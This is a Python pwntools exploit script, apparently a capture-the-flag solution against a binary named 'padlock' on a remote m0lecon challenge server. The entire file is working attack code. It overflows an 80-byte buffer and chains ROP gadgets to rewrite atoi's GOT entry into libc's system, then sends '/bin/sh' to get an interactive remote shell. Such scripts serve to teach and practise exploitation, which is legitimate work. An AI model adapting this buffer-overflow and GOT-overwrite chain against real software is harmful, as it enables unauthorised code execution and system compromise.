from pwn import *

OFF = 80
context.binary = elf = ELF("./padlock", checksec=False)
libc = ELF("/usr/lib/libc.so.6", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13543)

add_what = elf.sym["add_what_where"]
atoi_got = elf.got["atoi"]
main = elf.sym["main"]

pop_rdi = 0x00000000004011FF  # format string
pop_rsi = 0x0000000000401208  # got address
pop_rdx = 0x0000000000401211
ret = 0x000000000040101A

print(p.recvuntil(b"[padlock] Decimal combination: "))

# populate got table
first_run = flat(
    b"A" * OFF,
    p64(ret),
    p64(main),
)
p.sendline(first_run)

print(p.recvuntil(b"[padlock] Decimal combination: "))
diff = libc.symbols["system"] - libc.symbols["atoi"]
payload = flat(
    b"A" * OFF,
    p64(ret),
    p64(pop_rdi),
    p64(atoi_got),
    p64(pop_rsi),
    p64(diff),
    p64(add_what),
    p64(ret),
    p64(main),
)
p.sendline(payload)
p.sendline(b"/bin/sh")
p.interactive()